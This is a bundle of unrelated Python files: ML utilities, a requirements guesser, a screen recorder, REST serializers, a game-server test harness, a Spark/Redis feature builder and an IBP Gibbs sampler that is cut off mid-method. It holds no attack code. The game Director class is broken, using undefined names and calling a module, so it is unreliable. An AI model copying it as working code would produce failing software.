# [.5, .5, .5],
# [.66, .66, .66]])
#color_names = \
# ['black', 'blue', 'darkblue', 'skyblue',
# 'greyblue', 'lilac', 'green', 'red',
# 'cyan', 'violet', 'yellow', 'white',
# 'darkgrey', 'mediumgrey', 'lightgrey']
#
##Train a 20x30 SOM with 400 iterations
#som = SOM(20, 30, 3, 400)
#som.train(colors)
#
##Get output grid
#image_grid = som.get_centroids()
#
##Map colours to their closest neurons
#mapped = som.map_vects(colors)
#
##Plot
#fig = plt.figure('classification')
#plt.imshow(image_grid)
#plt.title('Color SOM')
#for i, m in enumerate(mapped):
# plt.text(m[1], m[0], color_names[i], ha='center', va='center',
# bbox=dict(facecolor='white', alpha=0.5, lw=0))
#plt.show()
#fig.savefig('plt.jpg')
|
import tensorflow as tf
from common.optimizer_template import OptimizerTemplate
class Optimizer(OptimizerTemplate):
    """Factory producing a TF1 Adam optimizer with configurable learning
    rate and epsilon; extra keyword arguments are accepted and ignored."""

    def __call__(self,
                 opt_learning_rate=0.001,
                 opt_epsilon=1e-8,
                 **kwargs):
        adam_kwargs = dict(learning_rate=opt_learning_rate,
                           epsilon=opt_epsilon)
        return tf.train.AdamOptimizer(**adam_kwargs)
#!/usr/bin/env python
#
# -- g@ut.am
import os
import re
import pkgutil
import argparse
def parse_import_string(l, debug=False):
    """Extract top-level module names from one line of Python source.

    Handles 'import x as y', 'import x, y' and 'from x.y import z'; trailing
    comments are stripped first.  Returns a (possibly empty) list of names.
    """
    l = l.strip().split('#')[0]
    # Raw strings avoid invalid-escape warnings; the patterns are unchanged.
    i = re.match(r'import\s*([a-zA-Z0-9][a-z0-9A-Z.-]+)\s+as\s+.+$', l) or \
        re.match(r'import\s*([a-zA-Z0-9][a-z0-9A-Z. ,-]+)$', l) or \
        re.match(r'from\s+([a-zA-Z0-9][^\s]+)\s+import [a-z0-9A-Z].*', l)
    if i:
        # Keep only the top-level package of each dotted name.
        modules = [_.split('.')[0]
                   for _ in re.split(r"\s+", i.group(1).strip().replace(",", " "))]
        if debug:
            # print() with one argument behaves identically on Python 2 and 3;
            # the old `print "..."` statement form was Python-2 only.
            print("\t{}\t => {}".format(l, modules))
        return modules
    return []
def grep_import_string_from_file(f, debug=False):
    """Return every line of file *f* that contains an import statement."""
    with open(f, 'r') as src:
        return [line for line in src.read().splitlines() if "import " in line]
def list_imports_from_file(f, existing_modules=None, debug=False):
    """Return the set-difference (as a list) of modules imported in file *f*
    and the names in *existing_modules*.

    FIX: the mutable-default-argument pitfall is avoided with a None
    sentinel; behaviour is unchanged since the argument is only read.
    The debug print now uses the py2/py3-compatible function form.
    """
    if existing_modules is None:
        existing_modules = []
    imports_in_file = []
    for import_string in grep_import_string_from_file(f, debug=debug):
        imports_in_file += parse_import_string(import_string, debug=debug)
    if debug:
        print("{} ->\n\t{}\n\t-\n\t{}".format(f, set(imports_in_file), set(existing_modules)))
    return list(set(imports_in_file) - set(existing_modules))
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description='Guess requirements.txt for your python project by parsing ' +
        '"import.." string in python source code. Shows the modules that ' +
        'must be installed for your code to run.\n' +
        'Note: local module directories inside codebase dir' +
        'are not shown. By default modules in sys.path are also not shown.')
    parser.add_argument('directory', type=str, nargs="?", default=".",
                        help='path to directory containing your python project')
    parser.add_argument('--all', action="store_true", help="show all modules even ones that are available")
    parser.add_argument('--debug', action="store_true", help="debug messages")
    args = parser.parse_args()
    debug = False
    system_module_list = []
    local_module_list = []
    imported_module_list = []
    rootDir = os.path.abspath(args.directory)
    if args.debug:
        debug = args.debug
    if not args.all:
        # Modules already importable in this interpreter get filtered out below.
        system_module_list = [m[1] for m in pkgutil.iter_modules()]
    for dirName, subdirList, fileList in os.walk(rootDir, topdown=True):
        # Ignore svn and test dir
        subdirList[:] = [d for d in subdirList
                         if os.path.basename(d)[0] != '.' and
                         not re.search('(test|\.bak)', os.path.basename(d))]
        if os.path.basename(dirName)[0] == '.' or re.search('(test|\.bak)', os.path.basename(dirName)):
            continue
        # add dir containing __init__.py to ignore
        if "__init__.py" in fileList:
            local_module_list.append(os.path.basename(dirName))
        # Names importable from within this directory: system modules,
        # sibling package directories and sibling .py files.
        importable_modules = system_module_list + subdirList +\
            [f.replace(".py", "") for f in fileList if re.match('.+\.py', f)]
        for fname in fileList:
            if not re.match('.*\.py', fname):
                continue
            imported_module_list += list_imports_from_file(dirName + '/' + fname,
                                                           existing_modules=importable_modules,
                                                           debug=debug)
    # Anything imported that is neither a local package nor (unless --all)
    # already installed in this interpreter.
    imported_modules = set(imported_module_list) - set(local_module_list)
    for i in imported_modules:
        if system_module_list:
            if not pkgutil.get_loader(i):
                print(i)
        else:
            print(i)
#
# end
|
# get the first number
# get the second number
# make an individual function to add, subtract, multiply and divide
# return from each function
# template for add function
def add(num1, num2):
    """Return the sum of the two numbers."""
    return num1 + num2
def sub(num1, num2):
    """Return the difference num1 - num2."""
    return num1 - num2
def multiply(num1, num2):
    """Return the product of the two numbers."""
    return num1 * num2
def division(num1, num2):
    """Return num1 / num2 (true division).

    Raises ZeroDivisionError when num2 == 0, like the original.
    """
    return num1 / num2
# Read the two operands (integers only) and print the four basic operations.
num1 = int(input("Enter the First Number"))
num2 = int(input("Enter the Second Number"))
print("The sum of number 1 and number 2 is ", (add(num1, num2)))
print(sub(num1, num2))
print(multiply(num1, num2))
print(division(num1, num2))
import cv2
import numpy as np
import pyautogui
import datetime
from win32api import GetSystemMetrics
import time
# The primary monitor's resolution defines the capture frame size.
w = GetSystemMetrics(0)
h = GetSystemMetrics(1)
dimension = (w, h)
# Timestamped output name, e.g. 01012024120000.avi
dateTime = datetime.datetime.now().strftime("%d%m%Y%H%M%S")
codec = cv2.VideoWriter_fourcc(*"XVID")
filename = dateTime + ".avi"
fps = 30.0
out = cv2.VideoWriter(filename, codec, fps, dimension)
# Small live preview window of the ongoing capture.
cv2.namedWindow("Live", cv2.WINDOW_NORMAL)
cv2.resizeWindow("Live", 480, 270)
# Record frames until the user presses 'q' in the preview window.
while True:
    img = pyautogui.screenshot()
    frame = np.array(img)
    # pyautogui yields RGB while VideoWriter expects BGR; COLOR_BGR2RGB and
    # COLOR_RGB2BGR perform the same channel swap, so the output is correct.
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    out.write(frame)
    cv2.imshow("Live", frame)
    if cv2.waitKey(10) == ord('q'):
        break
out.release()
# BUG FIX: `cv2.destroyAllWindows` was referenced without the call
# parentheses, so the preview window was never actually closed.
cv2.destroyAllWindows()
|
#!/usr/bin/env python
# -*-encoding:UTF-8-*-
from rest_framework import serializers
from options.options import SysOptions
class InvalidLanguage(serializers.ValidationError):
    """Validation error for an unknown language name.

    Base error class raised by the language choice fields below.
    """
    def __init__(self, name):
        super().__init__(detail=f"{name} is not a valid language")
class LanguageNameChoiceField(serializers.CharField):
    """Language selection field used when submitting code; rejects names
    not present in SysOptions.language_names."""
    def to_internal_value(self, data):
        value = super().to_internal_value(data)
        if value and value not in SysOptions.language_names:
            raise InvalidLanguage(value)
        return value
class SPJLanguageNameChoiceField(serializers.CharField):
    """Language selection field for Special Judge (SPJ) code; rejects names
    not present in SysOptions.spj_language_names."""
    def to_internal_value(self, data):
        value = super().to_internal_value(data)
        if value and value not in SysOptions.spj_language_names:
            raise InvalidLanguage(value)
        return value
class LanguageNameMultiChoiceField(serializers.ListField):
    """Multiple-language selection field; every entry must be a known
    language name or InvalidLanguage is raised for the first bad one."""
    def to_internal_value(self, data):
        values = super().to_internal_value(data)
        for name in values:
            if name not in SysOptions.language_names:
                raise InvalidLanguage(name)
        return values
class SPJLanguageNameMultiChoiceField(serializers.ListField):
    """Multiple-language selection field for Special Judge (SPJ) languages;
    every entry must be a known SPJ language name."""
    def to_internal_value(self, data):
        values = super().to_internal_value(data)
        for name in values:
            if name not in SysOptions.spj_language_names:
                raise InvalidLanguage(name)
        return values
|
import sys, os
import unittest
import logging
from protocol import FrostbiteServer, CommandFailedError
__all__ = ['Bf3_test_config', 'load_config_file', 'expect_error', 'BF3_connected_TestCase', 'BF3_authenticated_TestCase', 'CommandFailedError']
class Bf3_test_config(object):
    """Holds the BF3 test-server settings read from config.ini.

    All attributes are class-level and are populated by load_config_file().
    """
    host = None
    port = None
    pw = None
    ranked = None
    skip_time_consuming_tests = None
def load_config_file():
    """Load BF3 test server info from the config.ini next to this package.

    Populates the Bf3_test_config class attributes; prints a help message
    and exits the process when the file is missing or malformed.

    Forward-compat fixes (behaviour unchanged on Python 2): single-argument
    ``print(...)`` replaces the py2-only print statement, and
    ``except ... as err`` replaces the py2-only comma form.
    """
    # load BF3 test server info from config.ini file
    config_file = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'config.ini')
    def print_help_config_file():
        print("""ERROR: cannot find config file '%s'
config file content should look like :
[BF3]
host = xx.xx.xx.xx
port = 47000
password = s3cr3t
[TESTS]
skip_time_consuming_tests = true
""" % config_file)
    if not os.path.isfile(config_file):
        print_help_config_file()
        sys.exit(1)
    import ConfigParser
    try:
        config = ConfigParser.ConfigParser()
        config.read(config_file)
        Bf3_test_config.host = config.get('BF3', 'host')
        Bf3_test_config.port = config.getint('BF3', 'port')
        Bf3_test_config.pw = config.get('BF3', 'password')
        Bf3_test_config.ranked = config.getboolean('BF3', 'ranked')
        Bf3_test_config.skip_time_consuming_tests = config.getboolean('TESTS', 'skip_time_consuming_tests')
    except ConfigParser.NoSectionError as err:
        print("ERROR: %r" % err)
        print_help_config_file()
        sys.exit(1)
class expect_error(object):
    """
    decorator to expect CommandFailedError while sending a command to the BF3 server.

    The decorated test fails (AssertionError) when no CommandFailedError is
    raised, or when one is raised with a different error type than expected.
    """
    def __init__(self, error_type=''):
        self.error_type = error_type
    def __call__(self, func):
        def wrapper(*args, **kwargs):
            try:
                func(*args, **kwargs)
            # Forward-compat fix: 'as' form works on Python 2.6+ and 3,
            # unlike the py2-only `except CommandFailedError, err` form.
            except CommandFailedError as err:
                # NOTE(review): err.message is a Python-2-era attribute;
                # confirm CommandFailedError defines it explicitly.
                if err.message[0] != self.error_type:
                    raise AssertionError("expecting %s, got %r instead" % (self.error_type, err))
            else:
                # Completing without any error is also a failure.
                raise AssertionError("expecting error %s" % self.error_type)
        return wrapper
class TestFailuresTypes(tuple):
    """
    Tuple subclass that, when called, constructs an AssertionError.

    Assigning an instance to a unittest.TestCase's ``failureException``
    lets the runner treat the listed exception types as test failures
    rather than errors (isinstance checks see a tuple; raising code sees
    a callable that builds AssertionError).
    """
    def __call__(self, *args, **kwargs):
        # Delegate construction so failureException(...) yields AssertionError.
        return AssertionError(*args, **kwargs)
class _BF3_TestCase(object):
    """Mixin carrying the logger and config checks shared by both
    TestCase flavours (connected / authenticated)."""
    protocol_log_level = logging.ERROR
    @classmethod
    def setUpClassCommon(cls):
        if Bf3_test_config.host is None or Bf3_test_config.port is None:
            raise AssertionError("BF3 test server host and port not set")
        log_format = "%(name)-20s [%(thread)-4d] %(threadName)-15s %(levelname)-8s %(message)s"
        handler = logging.StreamHandler()
        handler.setFormatter(logging.Formatter(log_format))
        # Protocol logger follows the class setting; dispatcher stays at ERROR.
        for logger_name, level in (('FrostbiteServer', cls.protocol_log_level),
                                   ('FrostbiteDispatcher', logging.ERROR)):
            logging.getLogger(logger_name).addHandler(handler)
            logging.getLogger(logger_name).setLevel(level)
class BF3_connected_TestCase(unittest.TestCase):
    # CommandFailedError counts as a test failure (not an error) via the
    # callable-tuple trick in TestFailuresTypes.
    failureException = TestFailuresTypes((AssertionError, CommandFailedError))
    t_conn = None
    @classmethod
    def setUpClass(cls):
        """
        Setup loggers, connect to the test BF3 server.
        Run once for the whole class.
        """
        super(BF3_connected_TestCase, cls).setUpClassCommon()
        try:
            cls.t_conn = FrostbiteServer(Bf3_test_config.host, Bf3_test_config.port)
        except:
            # Deliberately broad: whatever went wrong, stop a half-open
            # connection before re-raising.
            if hasattr(cls, 't_conn') and cls.t_conn:
                cls.t_conn.stop()
            raise
    @classmethod
    def tearDownClass(cls):
        """
        run once after all tests are done.
        """
        cls.t_conn.stop()
    def cmd(self, *args):
        """
        convenient shortcut to send a command from our test methods.
        """
        return self.__class__.t_conn.command(*args)
# Mix _BF3_TestCase in after the fact so setUpClassCommon resolves through
# super(); done by mutating __bases__ rather than normal inheritance.
BF3_connected_TestCase.__bases__ += (_BF3_TestCase, )
class BF3_authenticated_TestCase(unittest.TestCase):
    # CommandFailedError counts as a test failure (not an error) via the
    # callable-tuple trick in TestFailuresTypes.
    failureException = TestFailuresTypes((AssertionError, CommandFailedError))
    t_conn = None
    @classmethod
    def setUpClass(cls):
        """
        Setup loggers, connect and auth to the test BF3 server.
        Run once for the whole class.
        """
        super(BF3_authenticated_TestCase, cls).setUpClassCommon()
        try:
            cls.t_conn = FrostbiteServer(Bf3_test_config.host, Bf3_test_config.port, Bf3_test_config.pw)
            cls.t_conn.auth()
        except:
            # Deliberately broad: whatever went wrong, stop a half-open
            # connection before re-raising.
            if hasattr(cls, 't_conn') and cls.t_conn:
                cls.t_conn.stop()
            raise
    @classmethod
    def tearDownClass(cls):
        """
        run once after all tests are done.
        """
        cls.t_conn.stop()
    def cmd(self, *args):
        """
        convenient shortcut to send a command from our test methods.
        """
        return self.__class__.t_conn.command(*args)
# Mix _BF3_TestCase in after the fact so setUpClassCommon resolves through
# super(); done by mutating __bases__ rather than normal inheritance.
BF3_authenticated_TestCase.__bases__ += (_BF3_TestCase, )
|
from time import sleep
from game import constants
from game.score import Score
from game import buffer
class Director:
    """A code template for a person who directs the game. The responsibility of
    this class of objects is to control the sequence of play.
    Stereotype:
        Controller
    Attributes:
        input_service (InputService): The input mechanism.
        keep_playing (boolean): Whether or not the game can continue.
        output_service (OutputService): The output mechanism.
        score (Score): The current score.
    """
    def __init__(self, input_service, output_service):
        """The class constructor.
        Args:
            self (Director): an instance of Director.
        """
        self._input_service = input_service
        self._keep_playing = True
        self._output_service = output_service
        self._score = Score()
        # NOTE(review): `buffer` is imported as a MODULE (`from game import
        # buffer`), so calling it raises TypeError — presumably a Buffer
        # class inside that module was intended; confirm.
        self._buffer = buffer()
        # NOTE(review): `word` is not defined or imported anywhere in this
        # module — this line raises NameError as written; confirm intent.
        self._word = word()
    def start_game(self):
        """Starts the game loop to control the sequence of play.
        Args:
            self (Director): an instance of Director.
        """
        while self._keep_playing:
            self._get_inputs()
            self._do_updates()
            self._do_outputs()
            sleep(constants.FRAME_LENGTH)
    def _get_inputs(self):
        """Gets the inputs at the beginning of each round of play. In this case,
        that means getting the desired direction and moving the snake.
        Args:
            self (Director): An instance of Director.
        """
        #Declare "direction" as the variable that holds the Director's directions, such as entering a word.
        direction = self._input_service.get_key()
        # ASCII value of 10 means the enter key.
        if direction == 10:
            # NOTE(review): `words` and `points` are undefined in this scope —
            # presumably pending attributes/constants; this branch raises
            # NameError as written. Confirm the intended source of both.
            for word in words:
                if word.text == self._buffer.get_content():
                    self._score.add_points(points)
                    word.reset()
    def _do_updates(self):
        """Updates the important game information for each round of play. In
        snake's case, it meant checking for a collision and updating the score.
        Args:
            self (Director): An instance of Director.
        """
        pass
    def _do_outputs(self):
        """Outputs the important game information for each round of play. In
        this case, that means checking if there are stones left and declaring
        the winner.
        Args:
            self (Director): An instance of Director.
        """
        self._output_service.clear_screen()
        #Not sure what the difference is between draw_actors and draw_actor, I think this depends on how the words are stored/displayed self._output_service.draw_actors(self._words)
        self._output_service.draw_actor(self._score)
        self._output_service.flush_buffer()
from app.infrastructure.humouword import HumouWordDataSource
from lib.domain.model.humouword import HumouWord
from lib.domain.model.humouword import WordId
from lib.domain.model.humou import Humou
from lib.domain.model.humou_factory import HumouFactory
class HumouWordRegisterService:
    """Application service that persists HumouWord entities."""

    def __init__(self, humou_word_datasource: HumouWordDataSource) -> None:
        self.humou_word_datasource = humou_word_datasource

    def register(self, humou_word: HumouWord) -> bool:
        """Store *humou_word* in the datasource; always reports success."""
        self.humou_word_datasource.register(humou_word)
        return True
class HumouWordGetService:
    """Application service for reading HumouWord entities."""

    def __init__(self, humou_word_datasource: HumouWordDataSource) -> None:
        self.humou_word_datasource = humou_word_datasource

    def find_all(self) -> list:
        """Return every stored HumouWord."""
        return self.humou_word_datasource.find_all()

    def find_by_id(self, word_id: WordId) -> HumouWord:
        """Return the HumouWord identified by *word_id*."""
        return self.humou_word_datasource.find_by_id(word_id)
class HumouWordDeleteService:
    """Application service that removes humou words from storage."""

    def __init__(self, humou_word_datasource: HumouWordDataSource) -> None:
        self.humou_word_datasource = humou_word_datasource

    def delete(self, humou_word: HumouWord) -> bool:
        """Delete one humou word; always reports success."""
        self.humou_word_datasource.delete(humou_word)
        return True

    def delete_multi(self, humou_word_list: list) -> bool:
        """Delete each humou word in *humou_word_list*; always reports success."""
        for entry in humou_word_list:
            self.humou_word_datasource.delete(entry)
        return True
class GetHumouService:
    """Builds a humou by pairing random top and bottom words."""

    def __init__(self, humou_word_datasource: HumouWordDataSource) -> None:
        self.humou_word_datasource = humou_word_datasource

    def get(self) -> dict:
        """Assemble a humou from random top/bottom words and return its dict form."""
        source = self.humou_word_datasource
        humou = HumouFactory.create(
            top_word=source.get_top_word_random(),
            bottom_word=source.get_bottom_word_random(),
        )
        return humou.to_dict()
|
from .models import Editor, Category, Author, Book
from .constants import SERVICE_CHOICES
from rest_framework import serializers
class EditorSerializer(serializers.ModelSerializer):
    """Serializes every field of the Editor model."""

    class Meta:
        model = Editor
        fields = '__all__'
class CategorySerializer(serializers.ModelSerializer):
    """Serializes every field of the Category model."""

    class Meta:
        model = Category
        fields = '__all__'
class AuthorSerializer(serializers.ModelSerializer):
    """Serializes every field of the Author model."""

    class Meta:
        model = Author
        fields = '__all__'
class BookSerializer(serializers.ModelSerializer):
    """Serializes every field of the Book model."""

    class Meta:
        model = Book
        fields = '__all__'
class SearchSerializer(serializers.Serializer):
    """Validates a search request: a free-text term plus the service to query."""

    # Free-text search term, capped at 200 characters.
    search_term = serializers.CharField(max_length=200)
    # Which alternative service to search; restricted to SERVICE_CHOICES.
    alternative_service = serializers.ChoiceField(choices=SERVICE_CHOICES)
class DeleteSerializer(serializers.Serializer):
    """Validates a delete request carrying the primary key of the record."""

    # Primary key of the record to delete.
    id = serializers.IntegerField()
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import errno
import os
import stat
from glob import glob1
from pants.base.project_tree import PTSTAT_DIR, PTSTAT_FILE, PTSTAT_LINK, ProjectTree
from pants.util.dirutil import fast_relpath, safe_walk
class FileSystemProjectTree(ProjectTree):
  """A ProjectTree implementation backed directly by the local filesystem.

  Every relative path is resolved against ``self.build_root``; absolute
  paths are rejected so lookups cannot escape the build root.
  """

  def _join(self, relpath):
    """Join a build-root-relative path, rejecting absolute paths."""
    if relpath.startswith(os.sep):
      raise ValueError('Absolute path "{}" not legal in {}.'.format(relpath, self))
    return os.path.join(self.build_root, relpath)

  def _glob1_raw(self, dir_relpath, glob):
    """Non-recursive glob within the given directory."""
    return glob1(self._join(dir_relpath), glob)

  def _listdir_raw(self, relpath):
    # TODO: use scandir which is backported from 3.x
    # https://github.com/pantsbuild/pants/issues/3250
    return os.listdir(self._join(relpath))

  def _isdir_raw(self, relpath):
    return os.path.isdir(self._join(relpath))

  def _isfile_raw(self, relpath):
    return os.path.isfile(self._join(relpath))

  def _exists_raw(self, relpath):
    return os.path.exists(self._join(relpath))

  def _content_raw(self, file_relpath):
    """Return the file's raw bytes."""
    with open(self._join(file_relpath), 'rb') as source:
      return source.read()

  def _relative_readlink_raw(self, relpath):
    return os.readlink(self._join(relpath))

  def _lstat_raw(self, relpath):
    """Classify relpath as PTSTAT_LINK/DIR/FILE, or None if it does not exist."""
    try:
      mode = os.lstat(self._join(relpath)).st_mode
      if stat.S_ISLNK(mode):
        return PTSTAT_LINK
      elif stat.S_ISDIR(mode):
        return PTSTAT_DIR
      elif stat.S_ISREG(mode):
        return PTSTAT_FILE
      else:
        raise IOError('Unsupported file type in {}: {}'.format(self, relpath))
    except (IOError, OSError) as e:
      if e.errno == errno.ENOENT:
        return None
      else:
        # BUG FIX: bare `raise` re-raises with the original traceback intact;
        # `raise e` discarded it.
        raise

  def _walk_raw(self, relpath, topdown=True):
    """Yield (relative root, dirs, files) triples below relpath."""
    def onerror(error):
      raise OSError(getattr(error, 'errno', None), 'Failed to walk below {}'.format(relpath), error)

    for root, dirs, files in safe_walk(self._join(relpath),
                                       topdown=topdown,
                                       onerror=onerror):
      yield fast_relpath(root, self.build_root), dirs, files

  def __eq__(self, other):
    return other and (type(other) == type(self)) and (self.build_root == other.build_root)

  def __ne__(self, other):
    return not self.__eq__(other)

  def __hash__(self):
    return hash(self.build_root)

  def __repr__(self):
    return '{}({})'.format(self.__class__.__name__, self.build_root)
|
from bicis.lib.utils import get_logger
logger = get_logger(__name__)
from bicis.etl.feature_extraction.next_window_target import NextWindowTarget
from bicis.lib.feature_builders.base_builders import FeatureBuilder
import redis
from pyspark.sql import SparkSession
redis_client = redis.StrictRedis()
class TargetFeatureBuilder(FeatureBuilder):
    """Serves the prediction target for a raw document from a Redis cache.

    Targets are precomputed by the NextWindowTarget task into a CSV; the
    ensure_structure step bulk-loads that CSV into Redis keyed by doc id,
    after which get_features is a single Redis lookup.
    """

    # TODO: check whether it makes sense to keep the `mode` parameter
    def __init__(self, mode='rent', window='1h'):
        """
        :param mode: whether to use the `rent` fields or the `return` fields on the raw_doc
        """
        super(TargetFeatureBuilder, self).__init__()
        # Time-window size forwarded to the upstream NextWindowTarget task.
        self.window = window
        self.mode = mode

    def get_features(self, raw_doc):
        # NOTE(review): redis returns raw bytes, or None on a cache miss --
        # confirm downstream consumers handle both.
        res = redis_client.get(self._get_key_field(raw_doc.id))
        return {'target': res}

    def requirements(self):
        # Upstream task that materializes the targets this builder reads.
        return NextWindowTarget(mode=self.mode, window=self.window)

    def ensure_structure(self):
        # Idempotent: a sentinel key marks that this (mode, window) combination
        # has already been loaded into Redis.
        done_key = 'TargetFeatureBuilder(mode={}, window={}).done'.format(self.mode, self.window)
        if redis_client.get(done_key):
            return

        spark_sql = SparkSession.builder.getOrCreate()
        input_fname = self.requirements().output().path

        # Stream the task's CSV output one row at a time to avoid
        # materializing the whole dataset in driver memory.
        rows_iterator = (spark_sql
            .read
            .load(
                input_fname,
                format="csv",
                sep=",",
                inferSchema="true",
                header="true")
        ).toLocalIterator()

        for row in rows_iterator:
            redis_client.set(
                self._get_key_field(row.id),
                row[self.requirements().output_field]
            )
        # Mark completion only after every row has been written.
        redis_client.set(done_key, 1)

    def _get_key_field(self, id):
        # NOTE(review): type(self) renders like "<class '...TargetFeatureBuilder'>",
        # an unusual key prefix -- confirm it matches what writers/readers expect.
        return '{}_id={}'.format(type(self), id)
|
"""
PyIBP
Implements fast Gibbs sampling for the linear-Gaussian
infinite latent feature model (IBP).
Copyright (C) 2009 David Andrzejewski (andrzeje@cs.wisc.edu)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
from scipy.stats import poisson, gamma
from scipy.special import gammaln, expit
from tqdm import tqdm_notebook
# We will be taking log(0) = -Inf, so turn off this warning
np.seterr(divide='ignore')
def lnfact(x):
    """Return log(x!) computed stably as log Gamma(x + 1)."""
    return gammaln(1 + x)
class Feature:
    """One data view for the linear-Gaussian IBP model.

    Holds the observed matrix X, the noise/weight variances (optionally with
    Gamma hyperpriors) and the posterior over the weight matrix A, kept in
    both moment form (meanA/covarA) and natural form (hA/infoA).
    """

    def __init__(self, data, sigma_x, sigma_a):
        self.X = data
        # Cached Gram matrix X'X, reused by the collapsed likelihood.
        self.XXT = self.X.T @ self.X
        self.N, self.D = data.shape
        # Each sigma may be a plain scalar or an (init, shape, rate) tuple;
        # the tuple form enables resampling via sampleSigma().
        sigma_x = sigma_x if isinstance(sigma_x, tuple) else (sigma_x, None, None)
        sigma_a = sigma_a if isinstance(sigma_a, tuple) else (sigma_a, None, None)
        _, self.sigma_xa, self.sigma_xb = sigma_x
        _, self.sigma_aa, self.sigma_ab = sigma_a
        self.var_x = sigma_x[0] ** 2
        self.var_a = sigma_a[0] ** 2
        # Posterior over A; populated lazily by the sampler.
        self.meanA, self.covarA, self.hA, self.infoA = (None,) * 4

    def logPxi(self, zi, i, noise=0):
        """Log-likelihood of data point i under latent row zi (A marginalized)."""
        # Mean/covar of xi given posterior over A
        meanLike = np.dot(zi, self.meanA)
        covarLike = np.dot(zi, np.dot(self.covarA, zi.T)) + self.var_x
        # Extra variance used by the new-feature Metropolis-Hastings proposal.
        covarLike += noise
        # Calculate log-likelihood of a single xi
        ll = self.D * np.log(covarLike) + np.power(self.X[i] - meanLike, 2).sum() / covarLike
        return -ll / 2

    def calcM(self, Z):
        """ Calculate M = (Z' * Z + (sigmax^2) / (sigmaa^2) * I)^-1 """
        K = Z.shape[1]
        return np.linalg.inv(np.dot(Z.T, Z) + self.var_x / self.var_a * np.eye(K))

    def logPX(self, Z):
        """ Calculate collapsed log likelihood of data """
        M = self.calcM(Z)
        K = Z.shape[1]
        lp = -self.N * self.D * np.log(2 * np.pi * self.var_x)
        lp -= K * self.D * np.log(self.var_a / self.var_x)
        lp += self.D * np.log(np.linalg.det(M))
        XZ = self.X.T @ Z
        lp -= np.trace(self.XXT - XZ @ M @ XZ.T) / self.var_x
        return lp / 2

    def sampleSigma(self, Z):
        """ Sample feature/noise variances from their Gamma posteriors """
        K = Z.shape[1]
        # Posterior over feature weights A
        meanA, covarA = self.postA(Z)
        # var_x: residual sum of squares plus posterior-uncertainty correction.
        # (renamed from `vars`, which shadowed the builtin)
        z_cov_diag = np.dot(Z, np.dot(covarA, Z.T)).diagonal()
        var_x = (np.power(self.X - np.dot(Z, meanA), 2)).sum()
        var_x += self.D * z_cov_diag.sum()
        n = float(self.N * self.D)
        postShape = self.sigma_xa + n / 2
        postScale = 1 / (self.sigma_xb + var_x / 2)
        tau_x = gamma.rvs(postShape, scale=postScale)
        self.var_x = 1 / tau_x
        # var_a
        var_a = covarA.trace() * self.D + np.power(meanA, 2).sum()
        n = float(K * self.D)
        postShape = self.sigma_aa + n / 2
        postScale = 1 / (self.sigma_ab + var_a / 2)
        tau_a = gamma.rvs(postShape, scale=postScale)
        self.var_a = 1 / tau_a

    def postA(self, Z):
        """ Mean/covar of posterior over weights A """
        M = self.calcM(Z)
        meanA = np.dot(M, np.dot(Z.T, self.X))
        # Reuse M instead of recomputing the matrix inverse a second time.
        covarA = self.var_x * M
        return meanA, covarA

    def weights(self, Z):
        """ Return E[A|X,Z] """
        return self.postA(Z)[0]

    def update(self, zi, xi, sub=False):
        """Add (sub=False) or remove (sub=True) data point i's rank-one
        contribution to the natural-parameter posterior over A.
        """
        xi, zi = xi.reshape(1, -1), zi.reshape(1, -1)
        # BUG FIX: the multiplier was inverted -- sub=True previously *added*
        # the point while callers (PyIBP.sampleZ) pass sub=True to remove it.
        sign = -1 if sub else 1
        self.infoA += sign * ((1 / self.var_x) * np.dot(zi.T, zi))
        self.hA += sign * ((1 / self.var_x) * np.dot(zi.T, xi))
class PyIBP(object):
    """Collapsed Gibbs sampler for a (multi-view) linear-Gaussian IBP.

    ``data`` is a list of NxD matrices sharing their rows; one binary latent
    matrix Z is shared across all views, each view wrapped in a Feature.
    """

    def __init__(self, data, alpha, sigma_xs, sigma_as):
        """
        data = list of NxD NumPy data matrices (should be centered)
        alpha = Fixed IBP hyperparam OR (init,a,b) tuple where
        (a,b) are Gamma hyperprior shape and rate/inverse scale
        """
        self.N = data[0].shape[0]
        self.feats = [Feature(d, sigma_x, sigma_a) for d, sigma_x, sigma_a in zip(data, sigma_xs, sigma_as)]
        # IBP hyperparameter: fixed scalar or (init, shape, rate) for resampling.
        if isinstance(alpha, tuple):
            (self.alpha, self.alpha_a, self.alpha_b) = alpha
        else:
            (self.alpha, self.alpha_a, self.alpha_b) = (alpha, None, None)
        self.initZ()
        self.Zs = []

    def initZ(self):
        """ Init latent features Z according to IBP(alpha) """
        Z = np.ones((0, 0))
        for i in range(1, self.N + 1):
            # Sample existing features proportionally to their popularity.
            # (np.float was removed in NumPy 1.24; plain float is equivalent)
            zi = (np.random.uniform(0, 1, (1, Z.shape[1])) <
                  (Z.sum(axis=0).astype(float) / i))
            # Sample new features
            knew = poisson.rvs(self.alpha / i)
            zi = np.hstack((zi, np.ones((1, knew))))
            # Add to Z matrix
            Z = np.hstack((Z, np.zeros((Z.shape[0], knew))))
            Z = np.vstack((Z, zi))
        self.Z = Z
        self.K = self.Z.shape[1]
        # Calculate initial feature counts
        self.m = self.Z.sum(axis=0)

    #
    # Convenient external methods
    #
    def fullSample(self):
        """ Do all applicable samples """
        self.sampleZ()
        if self.alpha_a is not None:
            self.sampleAlpha()
        for feat in self.feats:
            if feat.sigma_xa is not None:
                feat.sampleSigma(self.Z)

    def logLike(self, flag=False):
        """ Total log joint: IBP prior plus per-view collapsed likelihoods """
        return self.logIBP() + sum(f.logPX(self.Z) for f in self.feats)

    def sampleAlpha(self):
        """ Sample alpha from conjugate posterior """
        postShape = self.alpha_a + self.m.sum()
        postScale = 1 / (self.alpha_b + self.N)
        self.alpha = gamma.rvs(postShape, scale=postScale)

    def sampleZ(self):
        """ Take single sample of latent features Z """
        # for each data point
        order = np.random.permutation(self.N)
